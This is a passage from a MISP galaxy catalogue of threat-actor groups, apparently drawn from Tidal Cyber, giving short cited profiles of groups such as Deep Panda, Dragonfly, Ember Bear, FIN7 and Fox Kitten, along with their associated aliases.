The tag is: misp-galaxy:groups="DarkHydrus"

DarkVishnya

[DarkVishnya](https://app.tidalcyber.com/groups/d428f9be-6faf-4d57-b677-4a927fea5f7e) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.<sup>[[Securelist DarkVishnya Dec 2018](https://app.tidalcyber.com/references/da9ac5a7-c644-45fa-ab96-30ac6bfc9f81)]</sup>

The tag is: misp-galaxy:groups="DarkVishnya"

WebMasters - Associated Group

The tag is: misp-galaxy:groups="WebMasters - Associated Group"

PinkPanther - Associated Group

The tag is: misp-galaxy:groups="PinkPanther - Associated Group"

Shell Crew - Associated Group

The tag is: misp-galaxy:groups="Shell Crew - Associated Group"

KungFu Kittens - Associated Group

The tag is: misp-galaxy:groups="KungFu Kittens - Associated Group"

Black Vine - Associated Group

The tag is: misp-galaxy:groups="Black Vine - Associated Group"

Deep Panda

[Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. <sup>[[Alperovitch 2014](https://app.tidalcyber.com/references/72e19be9-35dd-4199-bc07-bd9d0c664df6)]</sup> The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). <sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup> This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. <sup>[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]</sup> [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. <sup>[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]</sup> Some analysts track [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) and [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) as the same group, but it is unclear from open source information if the groups are the same. <sup>[[ICIT China’s Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]</sup>

The tag is: misp-galaxy:groups="Deep Panda"

Berserk Bear - Associated Group

<sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Berserk Bear - Associated Group"

Crouching Yeti - Associated Group

<sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Crouching Yeti - Associated Group"

Energetic Bear - Associated Group

<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)]</sup><sup>[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Energetic Bear - Associated Group"

TEMP.Isotope - Associated Group

<sup>[[Mandiant Ukraine Cyber Threats January 2022](https://app.tidalcyber.com/references/6f53117f-2e94-4981-be61-c3da4b783ce2)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup>

The tag is: misp-galaxy:groups="TEMP.Isotope - Associated Group"

DYMALLOY - Associated Group

The tag is: misp-galaxy:groups="DYMALLOY - Associated Group"

TG-4192 - Associated Group

<sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="TG-4192 - Associated Group"

IRON LIBERTY - Associated Group

The tag is: misp-galaxy:groups="IRON LIBERTY - Associated Group"

Dragonfly

[Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.<sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup> Active since at least 2010, [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]</sup><sup>[[Fortune Dragonfly 2.0 Sept 2017](https://app.tidalcyber.com/references/b56c5b41-b8e0-4fef-a6d8-183bb283dc7c)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[CISA AA20-296A Berserk Bear December 2020](https://app.tidalcyber.com/references/c7bc4b25-2043-4f43-8320-590f82d0e09a)]</sup><sup>[[Symantec Dragonfly 2.0 October 2017](https://app.tidalcyber.com/references/a0439d4a-a3ea-4be5-9a01-f223ca259681)]</sup>

The tag is: misp-galaxy:groups="Dragonfly"

DragonOK

[DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is thought to have a direct or indirect relationship with the threat group [Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29). <sup>[[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)]</sup> It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. <sup>[[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)]</sup>

The tag is: misp-galaxy:groups="DragonOK"

TAG-22 - Associated Group

<sup>[[Recorded Future TAG-22 July 2021](https://app.tidalcyber.com/references/258433e7-f829-4365-adbb-c5690159070f)]</sup>

The tag is: misp-galaxy:groups="TAG-22 - Associated Group"

Earth Lusca

[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) operations may be financially motivated.<sup>[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]</sup>

[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has used malware commonly used by other Chinese threat groups, including [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) and the [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) cluster, however security researchers assess [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e)'s techniques and infrastructure are separate.<sup>[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]</sup>

The tag is: misp-galaxy:groups="Earth Lusca"

Elderwood Gang - Associated Group

The tag is: misp-galaxy:groups="Elderwood Gang - Associated Group"

Beijing Group - Associated Group

The tag is: misp-galaxy:groups="Beijing Group - Associated Group"

Sneaky Panda - Associated Group

The tag is: misp-galaxy:groups="Sneaky Panda - Associated Group"

Elderwood

[Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. <sup>[[Security Affairs Elderwood Sept 2012](https://app.tidalcyber.com/references/ebfc56c5-0490-4b91-b49f-548c00a59162)]</sup> The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. <sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup> <sup>[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]</sup>

The tag is: misp-galaxy:groups="Elderwood"

Saint Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Saint Bear - Associated Group"

Lorec53 - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Lorec53 - Associated Group"

UNC2589 - Associated Group

The tag is: misp-galaxy:groups="UNC2589 - Associated Group"

UAC-0056 - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="UAC-0056 - Associated Group"

Lorec Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Lorec Bear - Associated Group"

Bleeding Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Bleeding Bear - Associated Group"

Ember Bear

[Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) likely conducted the [WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) destructive wiper attacks against Ukraine in early 2022.<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup><sup>[[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)]</sup><sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:groups="Ember Bear"

Equation

[Equation](https://app.tidalcyber.com/groups/a4704485-65b5-49ec-bebe-5cc932362dd2) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. <sup>[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]</sup>

The tag is: misp-galaxy:groups="Equation"

Evilnum

[Evilnum](https://app.tidalcyber.com/groups/4bdc62c9-af6a-4377-8431-58a6f39235dd) is a financially motivated threat group that has been active since at least 2018.<sup>[[ESET EvilNum July 2020](https://app.tidalcyber.com/references/6851b3f9-0239-40fc-ba44-34a775e9bd4e)]</sup>

The tag is: misp-galaxy:groups="Evilnum"

EXOTIC LILY

[EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) is a financially motivated group that has been closely linked with [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) and the deployment of ransomware including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67). [EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.<sup>[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]</sup>

The tag is: misp-galaxy:groups="EXOTIC LILY"

Ferocious Kitten

[Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.<sup>[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]</sup>

The tag is: misp-galaxy:groups="Ferocious Kitten"

FIN10

[FIN10](https://app.tidalcyber.com/groups/345e553a-164d-4c9d-8bf9-19fcf8a51533) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. <sup>[[FireEye FIN10 June 2017](https://app.tidalcyber.com/references/9d5c3956-7169-48d5-b4d0-f7a56a742adf)]</sup>

The tag is: misp-galaxy:groups="FIN10"

Pistachio Tempest - Associated Group

<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:groups="Pistachio Tempest - Associated Group"

FIN12

FIN12 is a financially motivated threat actor group believed to be responsible for multiple high-profile ransomware attacks since 2018. The group has attacked victims in various sectors and locations, including multiple attacks on healthcare entities. An October 2021 Mandiant assessment indicated 85% of the group’s victims were U.S.-based, and the large majority of them were large enterprises with more than $300 million in annual revenue. The report also assessed that initial access brokers partnering with FIN12 target a wider range of organizations and allow FIN12 actors to select victims for further malicious activity.<sup>[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]</sup>

FIN12’s toolset has reportedly shifted over time. Cobalt Strike has been observed in most intrusions. While TrickBot and Empire were common post-exploitation tools historically, French authorities observed the group using SystemBC alongside Cobalt Strike during a March 2023 hospital center intrusion. Ryuk, and to a lesser degree Conti, were traditionally used ransomware payloads, with the former used in a series of attacks on U.S. healthcare entities in 2020. However, a French CERT assessment published in 2023 linked the group to multiple more recent incidents it investigated and analyzed, which featured deployment of various ransomware families, including Hive, Nokoyawa, Play, Royal, and BlackCat, along with Emotet and BazarLoader malware for initial footholds.<sup>[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]</sup><sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

Related Vulnerabilities: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:groups="FIN12"

Elephant Beetle - Associated Group

<sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup>

The tag is: misp-galaxy:groups="Elephant Beetle - Associated Group"

FIN13

[FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.<sup>[[Mandiant FIN13 Aug 2022](https://app.tidalcyber.com/references/ebd9d479-1954-5a4a-b7f0-d5372489733c)]</sup><sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup>

The tag is: misp-galaxy:groups="FIN13"

FIN4

[FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.<sup>[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)]</sup><sup>[[FireEye FIN4 Stealing Insider NOV 2014](https://app.tidalcyber.com/references/b27f1040-46e5-411a-b238-0b40f6160680)]</sup> [FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.<sup>[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)]</sup><sup>[[FireEye Hacking FIN4 Video Dec 2014](https://app.tidalcyber.com/references/6dcfe3fb-c310-49cf-a657-f2cec65c5499)]</sup>

The tag is: misp-galaxy:groups="FIN4"

FIN5

[FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. <sup>[[FireEye Respond Webinar July 2017](https://app.tidalcyber.com/references/e7091d66-7faa-49d6-b16f-be1f79db4471)]</sup> <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:groups="FIN5"

Skeleton Spider - Associated Group

<sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup>

The tag is: misp-galaxy:groups="Skeleton Spider - Associated Group"

Magecart Group 6 - Associated Group

<sup>[[Security Intelligence ITG08 April 2020](https://app.tidalcyber.com/references/32569f59-14fb-4581-8a42-3bf49fb189e9)]</sup>

The tag is: misp-galaxy:groups="Magecart Group 6 - Associated Group"

ITG08 - Associated Group

<sup>[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]</sup>

The tag is: misp-galaxy:groups="ITG08 - Associated Group"

FIN6

[FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.<sup>[[FireEye FIN6 April 2016](https://app.tidalcyber.com/references/8c0997e1-b285-42dd-9492-75065eac8f8b)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup>

The tag is: misp-galaxy:groups="FIN6"

GOLD NIAGARA - Associated Group

<sup>[[Secureworks GOLD NIAGARA Threat Profile](https://app.tidalcyber.com/references/b11276cb-f6dd-4e91-90cd-9c287fb3e6b1)]</sup>

The tag is: misp-galaxy:groups="GOLD NIAGARA - Associated Group"

ITG14 - Associated Group

The tag is: misp-galaxy:groups="ITG14 - Associated Group"

Carbon Spider - Associated Group

<sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup>

The tag is: misp-galaxy:groups="Carbon Spider - Associated Group"

FIN7

[FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) is a financially-motivated threat group that has been active since 2013. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) Group, but there appears to be several groups using [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware and are therefore tracked separately.<sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup><sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup><sup>[[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]</sup><sup>[[FireEye FIN7 Aug 2018](https://app.tidalcyber.com/references/54e5f23a-5ca6-4feb-8046-db2fb71b400a)]</sup><sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup><sup>[[Mandiant FIN7 Apr 2022](https://app.tidalcyber.com/references/be9919c0-ca52-593b-aea0-c5e9a262b570)]</sup>

The tag is: misp-galaxy:groups="FIN7"

Syssphinx - Associated Group

The tag is: misp-galaxy:groups="Syssphinx - Associated Group"

FIN8

[FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.<sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup><sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup><sup>[[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)]</sup><sup>[[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]</sup>

The tag is: misp-galaxy:groups="FIN8"

Pioneer Kitten - Associated Group

<sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup><sup>[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup>

The tag is: misp-galaxy:groups="Pioneer Kitten - Associated Group"

UNC757 - Associated Group

<sup>[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup><sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup>

The tag is: misp-galaxy:groups="UNC757 - Associated Group"

Parisite - Associated Group

The tag is: misp-galaxy:groups="Parisite - Associated Group"

Fox Kitten

[Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.<sup>[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)]</sup><sup>[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]</sup><sup>[[Dragos PARISITE ](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)]</sup><sup>[[ClearSky Pay2Kitten December 2020](https://app.tidalcyber.com/references/6e09bc1a-8a5d-4512-9176-40eed91af358)]</sup>

The tag is: misp-galaxy:groups="Fox Kitten"

Operation Soft Cell - Associated Group

The tag is: misp-galaxy:groups="Operation Soft Cell - Associated Group"

GALLIUM

[GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.<sup>[[Cybereason Soft Cell June 2019](https://app.tidalcyber.com/references/620b7353-0e58-4503-b534-9250a8f5ae3c)]</sup><sup>[[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)]</sup><sup>[[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]</sup>

The tag is: misp-galaxy:groups="GALLIUM"

Gallmaker

[Gallmaker](https://app.tidalcyber.com/groups/cd483597-4eda-4e16-bb58-353488511410) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.<sup>[[Symantec Gallmaker Oct 2018](https://app.tidalcyber.com/references/f47b3e2b-acdd-4487-88b9-de5cbe45cf33)]</sup>

The tag is: misp-galaxy:groups="Gallmaker"

Primitive Bear - Associated Group

<sup>[[Unit 42 Gamaredon February 2022](https://app.tidalcyber.com/references/a5df39b2-77f8-4814-8198-8620655aa79b)]</sup>

The tag is: misp-galaxy:groups="Primitive Bear - Associated Group"

Shuckworm - Associated Group

<sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup>

The tag is: misp-galaxy:groups="Shuckworm - Associated Group"

IRON TILDEN - Associated Group

<sup>[[Secureworks IRON TILDEN Profile](https://app.tidalcyber.com/references/45969d87-02c1-4074-b708-59f4c3e39426)]</sup>

The tag is: misp-galaxy:groups="IRON TILDEN - Associated Group"

ACTINIUM - Associated Group

<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:groups="ACTINIUM - Associated Group"

Armageddon - Associated Group

<sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup>

The tag is: misp-galaxy:groups="Armageddon - Associated Group"

DEV-0157 - Associated Group

<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

